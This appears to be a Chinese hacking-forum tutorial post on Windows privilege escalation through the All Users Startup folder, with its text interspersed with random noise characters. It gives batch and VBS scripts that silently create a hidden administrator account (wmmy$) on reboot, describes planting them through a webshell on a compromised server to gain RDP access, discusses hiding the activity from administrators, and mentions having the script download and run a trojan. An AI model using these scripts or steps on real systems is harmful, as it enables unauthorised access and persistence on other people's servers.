返回列表 发帖

[原创教程] 3AST提权课程之启动项提权

大家好,我是完美蚂蚁 今天给大家带来的提权教程是
' I: N2 }( h0 F6 x# S7 w启动 提权# c+ }7 y& K8 C" G" b
C:\Docume~1\All Users\「开始」菜单\程序\启动
+ h- p9 k7 h1 ]- c4 n在这里必须有写入权限 否则此方法无效
# f; c% b8 C, d因为我是在网吧 这里显示不了路径( l( S5 b+ T" {- ~, V) e/ x9 y
我去服务器上演示给大家看, M3 Z- N) V! f  o
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的6 j0 I' A! S& V& g+ G
文件 从而运行我们的文件
0 e, I# V8 i. \6 \3 l  _! H这里有两中方式 第一种是批处理
) ~# s4 e3 @; g( r* T我们来看下目前 我机器上的用户组1 O4 G4 g: w( o5 z7 S4 v; `% G5 I
目前我们没有521这个用户
* q- G( v7 `* t. o) [& @, B看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示1 c/ M( w, o. A1 M; A1 b
大家看到了吧  如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现  {* r- J  x2 n% I
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的# w& M/ V0 G1 y, O; m, X7 ?
大家看 已经成功加入了WMMY用户: t+ W7 c/ P7 j
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了" N; u; L; s8 \& j- B3 G
当前终端服务端口: 33897 @* r( W& m+ T0 L7 q
系统自动登录功能未开启" k5 F  j, ?; n1 t) i& F. X
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了, m+ u* Q* M& `
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
9 D1 K  t0 u8 c8 {. d9 Y第一种隐蔽性太差  我们就用第二种吧; K- f: `/ i9 {5 q
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
7 G" D1 }7 D( G从而取得了3389的登陆权限
% w, D& Y& u' B; D其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
- P& o7 b' h! t; T0 o5 l基本原理都差不多  我就不多介绍了$ o; i# ^% i# f, v% J) r
教程结束```' w$ v0 Q6 k' |- ]
@echo off6 ^- k! }0 @) ]' \/ }
net user 521 521 /add
. j/ J% A7 }% T4 Snet localgroup administrators 521 /add( Q& _* e; B) K3 H. H, X' T( ~( K% V

$ }. p% R" z& E( g! I8 non Error Resume next
  }* @' M3 c( c; s1 _set wshshell=createobject("wscript.shell")
( q8 _8 c/ d4 @a=wshshell.run("net user wmmy$ 1227 /add",0); G& q% S1 O( X8 G! v) j5 c% U
a=wshshell.run("net localgroup administrators wmmy$ /add",0)* t2 Z' A% L; ^7 s- Y5 [/ g" ]

% n+ _9 ~) e5 ~( Y$ o; y+ y3 I
( ^$ q+ N' C) r. G点击下载% J( z/ ?, Q0 x5 O; E& n
2

评分人数

  • 柔肠寸断

  • zhuyahui

返回列表